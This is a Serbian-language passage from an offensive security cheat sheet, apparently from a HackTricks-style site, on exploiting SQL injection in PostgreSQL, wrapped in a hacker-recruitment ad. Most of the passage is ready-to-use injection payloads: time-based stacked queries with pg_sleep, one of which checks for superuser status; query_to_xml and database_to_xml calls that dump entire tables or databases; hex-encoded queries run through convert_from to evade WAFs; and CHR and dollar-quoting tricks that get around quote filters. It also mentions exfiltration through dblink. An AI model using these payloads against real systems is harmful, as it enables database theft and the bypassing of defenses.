Ako ste zainteresovani za hakersku karijeru i hakovanje neuhvatljivog - zapošljavamo! (potrebno je tečno poznavanje poljskog jezika, kako pisano tako i govorno).

Ova stranica ima za cilj da objasni različite trikove koji bi vam mogli pomoći da iskoristite SQL ubacivanje pronađeno u postgresql bazi podataka i da dopunite trikove koje možete pronaći na https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md

Mrežna interakcija - Eskalacija privilegija, skener portova, otkrivanje NTLM izazova i eksfiltracija

PostgreSQL modul dblink nudi mogućnosti za povezivanje sa drugim PostgreSQL instancama i izvršavanje TCP veza. Ove funkcionalnosti, zajedno sa funkcionalnošću COPY FROM, omogućavaju akcije poput eskalacije privilegija, skeniranja portova i hvatanja NTLM izazova. Za detaljne metode izvođenja ovih napada proverite kako izvršiti ove napade.

Primer eksfiltracije korišćenjem dblink-a i velikih objekata

Možete pročitati ovaj primer da vidite CTF primer kako učitati podatke unutar velikih objekata i zatim eksfiltrirati sadržaj velikih objekata unutar korisničkog imena funkcije dblink_connect.

PostgreSQL Napadi: Čitanje/pisanje, RCE, eskalacija privilegija

Proverite kako da kompromitujete host i eskalirate privilegije iz PostgreSQL-a u:

Bypass WAF

PostgreSQL String funkcije

Manipulisanje stringovima može vam pomoći da zaobiđete WAF-ove ili druge restrikcije. Na ovoj stranici možete pronaći neke korisne funkcije za stringove.

Stacked Queries

Zapamtite da postgresql podržava stacked queries, ali neke aplikacije će prijaviti grešku ako se vrate 2 odgovora kada se očekuje samo 1. Ipak, možete i dalje zloupotrebiti stacked queries putem Time ubacivanja:

id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -

XML trikovi

query_to_xml

Ova funkcija će vratiti sve podatke u XML formatu u samo jednom fajlu. Idealno je ako želite da izbacite veliku količinu podataka u samo 1 red:

SELECT query_to_xml('select * from pg_user',true,true,'');

database_to_xml

Ova funkcija će izbaciti celu bazu podataka u XML formatu u samo 1 redu (budite oprezni ako je baza podataka veoma velika jer možete izazvati DoS napad ili čak preopteretiti vašeg klijenta):

SELECT database_to_xml(true,true,'');

Stringovi u heksadecimalnom formatu

Ako možete izvršiti upite prosleđujući ih unutar stringa (na primer koristeći funkciju query_to_xml). Možete koristiti convert_from da prosledite string kao heksadecimalni zapis i zaobiđete filtere na ovaj način:

select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');

# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h

# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -

Zabranjeni navodnici

Ako ne možete koristiti navodnike za svoj payload, možete zaobići to pomoću CHR za osnovne klauze (konkatenacija karaktera radi samo za osnovne upite poput SELECT, INSERT, DELETE, itd. Ne radi za sve SQL naredbe):

SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);

Ili sa $. Ovi upiti vraćaju iste rezultate:

SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;

Ako ste zainteresovani za hakersku karijeru i hakovanje onoga što se ne može hakovati - zapošljavamo! (potrebno je tečno poznavanje poljskog jezika, kako pismeno tako i usmeno).